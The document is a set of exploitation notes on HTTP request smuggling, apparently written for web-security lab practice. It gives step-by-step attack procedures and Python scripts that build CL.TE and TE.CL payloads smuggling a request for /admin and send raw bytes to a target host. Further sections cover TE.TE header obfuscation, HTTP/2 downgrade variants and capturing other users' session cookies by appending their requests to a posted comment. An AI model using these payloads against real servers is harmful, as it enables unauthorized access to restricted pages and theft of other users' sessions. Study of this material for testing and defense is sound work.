HTTP Request Smuggling
Requirements:
Steps to Exploit:
Identify server architecture:
Determine whether the target is using a proxy server, load balancer, or other intermediary server between the client and the backend server. Tools like Burp Suite can help identify whether multiple servers are handling the requests.
Analyze HTTP request handling:
Look for any differences in how the front-end server and the backend server parse requests. In particular, check for discrepancies in how the Content-Length and Transfer-Encoding headers are interpreted: each server must decide where one request ends and the next begins, and if the two pick different headers for that decision they disagree on the message boundary.
Craft smuggling payload:
Construct an HTTP request that exploits the difference in how the two servers parse the length headers. For example, a request that carries both headers, where Content-Length covers the whole body but the chunked body terminates early: the front-end forwards the whole body as-is to the backend, while the backend stops at the terminating chunk and interprets the remaining bytes (e.g. GET /admin) as the start of a separate request.
Test smuggling with tools:
Use tools like Burp Suite to send crafted HTTP requests and observe how the server handles them. A successful HTTP Request Smuggling attack shows up as the backend answering the smuggled request, or as an unexpected response to a later, innocent request sent on the same connection, because the two servers split the byte stream into a different number of requests.
Exploit access:
Once smuggling is successful, use the vulnerability to send unauthorized requests (e.g., accessing internal admin pages) or to deliver further attacks, like exploiting XSS or stealing session tokens from other users.
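The steps above, carried through as an added example (not code from the original notes): it builds a CL.TE and a TE.CL payload and then frames the same bytes once with a Content-Length-only parser and once with a Transfer-Encoding-only parser, which is exactly the disagreement the front-end/backend pair has. The host vulnerable.example, the /admin path and the send_raw helper are assumptions for illustration.

```python
"""Added example (not from the original notes): build CL.TE and TE.CL
smuggling payloads and simulate how a server that frames requests by
Content-Length and one that frames them by Transfer-Encoding split the
very same bytes into a different number of requests.
'vulnerable.example' and '/admin' are assumed placeholders."""
import socket

TARGET = "vulnerable.example"  # assumed placeholder host


def build_cl_te(host: str, smuggled: bytes) -> bytes:
    """CL.TE: Content-Length covers the whole body, so a CL-based front-end
    forwards everything; a TE-based back-end stops at the 0 chunk and keeps
    `smuggled` as the prefix of the next request on the connection."""
    body = b"0\r\n\r\n" + smuggled
    return (b"POST / HTTP/1.1\r\nHost: %s\r\nContent-Length: %d\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" % (host.encode(), len(body)) + body)


def build_te_cl(host: str, smuggled: bytes) -> bytes:
    """TE.CL: Content-Length covers only the chunk-size line, so a CL-based
    back-end treats the chunk data (`smuggled`) as a second request, while a
    TE-based front-end consumes everything up to the terminating 0 chunk."""
    size_line = b"%x\r\n" % len(smuggled)
    body = size_line + smuggled + b"\r\n0\r\n\r\n"
    return (b"POST / HTTP/1.1\r\nHost: %s\r\nContent-Length: %d\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" % (host.encode(), len(size_line)) + body)


def _header_block(stream: bytes):
    """Return (headers, index of first body byte) or (None, None) if incomplete."""
    end = stream.find(b"\r\n\r\n")
    return (None, None) if end < 0 else (stream[:end], end + 4)


def split_by_content_length(stream: bytes) -> list:
    """Frame requests using Content-Length only (Transfer-Encoding ignored)."""
    reqs = []
    while stream:
        head, body_start = _header_block(stream)
        if head is None:            # headers incomplete: server would wait for more bytes
            reqs.append(stream)
            break
        length = 0
        for line in head.split(b"\r\n"):
            if line.lower().startswith(b"content-length:"):
                length = int(line.split(b":", 1)[1].strip())
        end = body_start + length
        reqs.append(stream[:end])
        stream = stream[end:]
    return reqs


def split_by_chunked(stream: bytes) -> list:
    """Frame requests using Transfer-Encoding: chunked only (Content-Length ignored)."""
    reqs = []
    while stream:
        head, pos = _header_block(stream)
        if head is None:
            reqs.append(stream)
            break
        if b"transfer-encoding: chunked" in head.lower():
            while True:             # walk chunks until the zero-length chunk
                line_end = stream.find(b"\r\n", pos)
                size = int(stream[pos:line_end], 16)
                pos = line_end + 2 + size + 2
                if size == 0:
                    break
        reqs.append(stream[:pos])
        stream = stream[pos:]
    return reqs


def send_raw(host: str, payload: bytes, port: int = 80) -> bytes:
    """Send the raw bytes on a single connection and return the first response bytes."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(payload)
        return s.recv(65536)


if __name__ == "__main__":
    # The smuggled prefix is deliberately left without a blank line: on the
    # desynced side it is completed by the next (victim's) request.
    smuggled = b"GET /admin HTTP/1.1\r\nHost: %s\r\n" % TARGET.encode()
    for name, payload in (("CL.TE", build_cl_te(TARGET, smuggled)),
                          ("TE.CL", build_te_cl(TARGET, smuggled))):
        print(name, "CL framing sees", len(split_by_content_length(payload)),
              "request(s); TE framing sees", len(split_by_chunked(payload)))
```

Running the script shows the asymmetry directly: for the CL.TE payload the Content-Length parser sees one request and the chunked parser sees two, and for the TE.CL payload it is the other way round. Whichever side parses second is the one that will answer the smuggled GET /admin (or prepend it to the next user's request).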
Detection
TE.TE
If duplicate header names are allowed and HTTP Request Smuggler reports the vulnerability as dualchunk, add a second Transfer-Encoding header with an obfuscated value (e.g. Transfer-encoding: cow): one server honours the first header and treats the body as chunked, the other rejects the unrecognised encoding and falls back to Content-Length.
Steal cookie with TE.TE
TE.CL
Access blocked path with smuggling
CL.TE
Access blocked resources
To capture the victim's request (including cookies) inside a posted comment, set the smuggled POST's Content-Length to a large number so that the victim's request bytes are appended to the comment body.
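Why the duplicate-header trick in the TE.TE note works, as an added example (not from the original notes): two servers that both support chunked encoding but follow different policies for picking among several Transfer-Encoding headers end up framing the body differently. The three policies (first, last, strict) are hypothetical models for illustration and do not describe any specific product.

```python
"""Added example: model the TE.TE disagreement.  The policies below are
hypothetical parsing rules, not the behaviour of any named server."""


def transfer_encodings(raw_headers: bytes) -> list:
    """All Transfer-Encoding values in order; header name matched case-insensitively."""
    values = []
    for line in raw_headers.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"transfer-encoding":
            values.append(value.strip())
    return values


def uses_chunked(raw_headers: bytes, policy: str) -> bool:
    """Does a server following `policy` frame the body as chunked?
    'first'  - honours the first Transfer-Encoding header it sees
    'last'   - honours the last one (later headers override earlier ones)
    'strict' - chunked only if every value is exactly 'chunked'; any unknown
               value makes it ignore TE and fall back to Content-Length"""
    encodings = transfer_encodings(raw_headers)
    if not encodings:
        return False
    if policy == "first":
        return encodings[0].lower() == b"chunked"
    if policy == "last":
        return encodings[-1].lower() == b"chunked"
    if policy == "strict":
        return all(e == b"chunked" for e in encodings)
    raise ValueError("unknown policy: %s" % policy)


def te_te_desync(raw_headers: bytes, frontend_policy: str, backend_policy: str) -> bool:
    """True when front-end and back-end disagree on framing, i.e. smuggling is possible."""
    return uses_chunked(raw_headers, frontend_policy) != uses_chunked(raw_headers, backend_policy)


# Constructed header blocks for the demonstration.
PLAIN = (b"Host: vulnerable.example\r\n"
         b"Content-Length: 13\r\n"
         b"Transfer-Encoding: chunked")
DUAL = (b"Host: vulnerable.example\r\n"
        b"Content-Length: 13\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"Transfer-encoding: cow")

if __name__ == "__main__":
    for fe, be in (("first", "strict"), ("first", "last"), ("last", "strict")):
        print("front-end=%s back-end=%s: plain desync=%s, dual desync=%s"
              % (fe, be, te_te_desync(PLAIN, fe, be), te_te_desync(DUAL, fe, be)))
```

The plain single-header request never desyncs because every policy agrees on it; the duplicated header splits a first-wins front-end from either a last-wins or a strict back-end, which is the pairing HTTP Request Smuggler's dualchunk probe is looking for.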
H2
The target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests to HTTP/1.1 and fails to adequately sanitize incoming headers. Exploitation uses an HTTP/2-exclusive request smuggling vector to steal a victim's session cookie and gain access to that user's account.
Note: enable the Allow HTTP/2 ALPN override option and change the body of the HTTP/2 request to the POST request below.
The search term is reflected on the website.
H2.TE desync v10a h2path
The target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even when they have an ambiguous length. Steal the session cookie of the admin visiting the target. The Burp extension HTTP Request Smuggler identifies this as an HTTP/2 TE desync v10a (H2.TE) vulnerability.
CL0
In Repeater, group the attack request with the follow-up request, then use the Send button's drop-down to change the send mode to Send group in sequence (single connection), so both requests travel over the same connection to the backend.